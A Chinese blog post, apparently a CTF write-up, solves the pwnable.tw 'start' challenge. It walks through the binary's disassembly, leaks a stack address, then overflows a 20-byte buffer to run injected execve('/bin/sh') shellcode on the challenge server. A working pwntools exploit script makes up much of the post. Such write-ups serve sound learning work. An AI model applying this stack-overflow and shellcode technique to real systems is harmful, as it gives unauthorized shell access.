pwnable.tw---start

最新推荐文章于 2022-01-29 08:44:26 发布
最新推荐文章于 2022-01-29 08:44:26 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: Pwnable.tw 文章标签: Pwnable.tw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/80151071
版权

Pwnable.tw—start

最近比赛玩了好几天的pwn,发现老是差点火候,开始正式刷刷Pwnable.tw看看。

题目分析:

checksec :
这里写图片描述
第一次遇到什么防护都不开的程序,兴奋。

IDA:
题目只有start和exit。
检测栈有点问题,不能够F5,强行看汇编。。。 

.text:08048060                 public _start
.text:08048060 _start          proc near
.text:08048060                 push    esp
.text:08048061                 push    offset _exit
.text:08048066                 xor     eax, eax
.text:08048068                 xor     ebx, ebx
.text:0804806A                 xor     ecx, ecx
.text:0804806C                 xor     edx, edx
.text:0804806E                 push    ':FTC'
.text:08048073                 push    ' eht'
.text:08048078                 push    ' tra'
.text:0804807D                 push    'ts s'
.text:08048082                 push    2774654Ch
.text:08048087                 mov     ecx, esp        ; addr
.text:08048089                 mov     dl, 14h         ; len
.text:0804808B                 mov     bl, 1           ; fd
.text:0804808D                 mov     al, 4
.text:0804808F                 int     80h             ; LINUX - sys_write
.text:08048091                 xor     ebx, ebx
.text:08048093                 mov     dl, 3Ch
.text:08048095                 mov     al, 3
.text:08048097                 int     80h             ; LINUX -
.text:08048099                 add     esp, 14h
.text:0804809C                 retn
.text:0804809C _start          endp ; sp-analysis failed
.text:0804809C
.text:0804809D
.text:0804809D ; =============== S U B R O U T I N E =======================================
.text:0804809D
.text:0804809D ; Attributes: noreturn
.text:0804809D
.text:0804809D ; void exit(int status)
.text:0804809D _exit           proc near               ; DATA XREF: _start+1o
.text:0804809D                 pop     esp
.text:0804809E                 xor     eax, eax
.text:080480A0                 inc     eax
.text:080480A1                 int     80h             ; LINUX - sys_exit
.text:080480A1 _exit           endp ; sp-analysis failed
.text:080480A1
.text:080480A1 _text           ends
.text:080480A1
.text:080480A1
.text:080480A1                 end _start

汇编代码直接采用了系统调用,
具体的翻译可以看这个:
Linux Sysycall Reference
把这个汇编翻译成C:
这里写图片描述
(并不是很想用软件画QAQ)
下面是翻译的代码:

void start()
{
    buf[20]="Let's start the CTF:";
    sys_write(1,buf,20);
    sys_read(0,buf,60);
}
void exit()
{
    sys_exit();
}

思路分析:

1.没有保护,在buf开始写入shellcode,直接栈溢出,跳到buf的位置,然后执行即可。
但是buf只有20位,shellcode有21-44位,行不通。Pass!

2.既然堆不够那就看栈,先跳到buf的首地址08048087,跳到利用write函数leak出&buf的栈地址,然后再利用read在栈的溢出位置&buf+20的位置写入shellcode,从而二次溢出时跳到栈的位置+20即shellcode的栈位置从而执行栈上的shellcode。

执行测试:

先leak出buf的地址。
代码:

#coding:utf-8
from pwn  import *

file_name="./start"
context(log_level = 'debug', arch = 'i386', os = 'linux')
p=process(file_name)#本地
#p=remote('pwnable.kr',9000)#远程
buf_ar=0x8048087
def leak():

    p.recv(100)
    payload='A'*20+p32(buf_ar)
    p.send(payload)
    k=p.recv(4)
    return hex(u32(k))
buf_sta=leak()
print "buf's stack address is:",buf_sta

结果如下:
这里写图片描述
程序到这里有会有read。
所以再后面来一次栈溢出,执行shellcode。
由于用pwn的shellcraft.sh的位数多于60位,所以要换一个shellcode。

exp:

#coding:utf-8
from pwn  import *

file_name="./start"
context(log_level = 'debug', arch = 'i386', os = 'linux')
#p=process(file_name)#本地
p=remote('chall.pwnable.tw',10000)#远程
#shellcode=asm(shellcraft.sh())
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

buf_ar=0x8048087

def leak():
    p.recv(100)
    payload='A'*20+p32(buf_ar)
    p.send(payload)
    k=p.recv(4)
    return u32(k)
def get_pwn(addr):
    payload='A'*20+p32(addr+20)+shellcode
    #print "payload len is :",len(payload)
    p.send(payload)
    p.interactive()
buf_sta=leak()
print "buf's stack address is:",buf_sta
get_pwn(buf_sta)

这里写图片描述

Jaken1223
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 588
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
hackathon.tw-website
06-03
鲍尔 $ npm install -g bower$ bower i吞咽 $ npm install -g gulp$ npm install -g less$ npm i用法 $ gulp less
pwnable.tw--->start 01
程序员晓老九
10-18 179
pwnable.tw 01 前提--->链接 PWNABLE.TW 02 Challenges 01 start IDA似乎看不出啥来 扔到peda反汇编看一看,因为是x86(file可知),先写再读。 就知道这么点信息,没啥头绪,猜测是shellcode解。 write的长度是0x14,read的长度是0x3c,明显读的比写的长 覆盖_exit的offset是20,两种方法 1 在_start的ret处下断点--->到退出是20,32位对...
pwnable start
m0_57754423的博客
01-25 1711
如果有什么不懂的地方,可以在评论区评论哦,看到就会回答的。 拿到附件以后 checksec一下: 32位程序 没有开启任何保护,放入ida中看一下,只有两个函数_start和_exit,这个题目的源码就不是C代码,本身就是汇编代码,: 我们看汇编代码: 大概流程就是 先压栈esp和exit函数地址,然后压栈字符串,我们可以先运行一下这个程序: 中间的五次push应该就是压入的这些字符串。 随后 write系统调用 打印这些字符串,然后 read系统调用 让用户写入数据 write了
Pwnable.tw start [Writeup]
柷敔的博客
02-18 877
Pwnable.tw start [Writeup] 题源 https://pwnable.tw/challenge/#1 题解 先看一下安全保护情况 再dump一下源码 拖到IDA一看,也就是内联汇编写的代码(此处略去)。毕竟是入门第一题,都是用的简单的汇编指令。简单注释一下: [line 1]08048060 <_start>: [line 2] 8048060: 54 push %esp ; 泄露了栈地
pwnable_start
pondzhang的专栏
03-13 344
from pwn import * loacl_elf = ELF("./start") context.arch = loacl_elf.arch #p = process("./start") p = remote("node3.buuoj.cn",28802) #gdb.attach(p, 'b* 0x08048060') #shellcode=asm(shellcraft.sh()) shellcode = asm("xor ecx,ecx;\ xor edx,.
TW6.1.5.8-Enterprise-Linux
08-31
TW6.1.5.8_Enterprise_Linux TongHttpServer(THS)是一款功能强大、稳定高效、高性价比、易于使用、便于维护的负载均衡软件产品。THS 不仅可以满足用户对负载均衡服务的需求,提升系统可靠性、高效性、可扩展性及...
I-120E 公版软件-TW.TW-ONU_V1.0_R1B01D30127-4339.w.zip
11-06
"I-120E 公版软件-TW.TW-ONU_V1.0_R1B01D30127-4339.w.zip" 这个标题揭示了几个关键信息。首先,“I-120E”是设备型号,这通常指的是一个特定的光网络单元(Optical Network Unit, ONU),在家庭或小型企业网络中...
PyPI 官网下载 | tw2.core-2.2.1.1-py2.7.egg
02-07
标题中的“PyPI 官网下载 | tw2.core-2.2.1.1-py2.7.egg”指的是Python的包管理器PyPI(Python Package Index)上发布的名为`tw2.core`的库的一个特定版本,即2.2.1.1,且这个版本是针对Python 2.7编译的。...
ModernWeb.tw-2015:ModernWeb.tw 2015 演讲
06-06
在2015年,"ModernWeb.tw"这个会议探讨了Web技术的最新进展和未来趋势,尤其是聚焦于HTML的发展。HTML,全称为超文本标记语言(HyperText Markup Language),是构建网页内容的基础语言,自其诞生以来,一直在不断...
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1546
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
pwnable.tw 001
foyjog的研究生涯
09-08 606
https://pwnable.tw/的网址,他是一个提供pwn题目的网址,做逆向破解,做做二进制也是必须的,所以也把做这些题目的心得记录下来。 第一题,start,地址为nc chall.pwnable.tw 10000,我们下载这个文件,然后拖入ida进行分析。 很短的代码,贴出来如下:ext:08048060 public _start .text:0804
pwnable.tw writeup
钞sir的博客
02-27 4056
start 这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数; sir@sir-PC:~/desktop$ objdump -R start start: 文件格式 elf32-i386 objdump: start:不是动态对象 objdump: start: 无效的操作 反汇编代码: sir@sir-PC:~/desktop$ objdu...
pwnable-random
网安星空
01-29 179
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是random,主要考察的是函数rand的知识点。
pwnable.tw 题解笔记
我多么希望明天有太阳,来灼烧我腐烂的梦想
09-05 408
题目 orw 考察写shellcode 题目只允许使用read/write/open. 系统调用表: https://introspelliam.github.io/2017/08/06/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%BA%A6%E5%AE%9A/ #coding=utf-8 from pwn import * p = remote('chal...
小白pwn之旅之pwnable09
qq_41078843的博客
05-07 171
pwnable----unlink,blukat和horcruxer unlink 看源代码 #include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; c...
horcruxes-pwnable
SkYe's Blog
10-04 717
前言 这题考的是ROP系统攻击。百度百科是这样介绍的: 简介:ROP全称为Return-oriented Programming(面向返回的编程)。是一种基于代码复用的攻击技术,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 内在特征:1. ROP控制流中,call和ret指令不操纵函数,而是用于将函数面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开...
Pwnable.kr WP
AlexYoung28的博客
08-13 932
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
pwnable_001
for_mat_的博客
09-05 191
ssh直连 $cat fd.c buf面存的要是LETMEWIN才有可能拿到???? 所以往上一语句查看 buf的值是从fd获得的 argc是参数的个数 有一个默认参数,除了默认参数外还要传入其他参数argv[1],才有可能拿到旗 fd是文件指针文件指针如果为0,就会变成stdin键盘输入,argv[0]是文件名 因此: 只要fd的值为0就可以进行输入了 0x1...
tw-asr-one
最新发布
10-01
tw-asr-one 是一个语音识别技术的模型或项目名称。tw-asr-one 的全称是 "Tencent WeChat Automatic Speech Recognition One",是腾讯公司开发的一种自动语音识别系统。 语音识别技术是一种将人类语音转换成文本的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值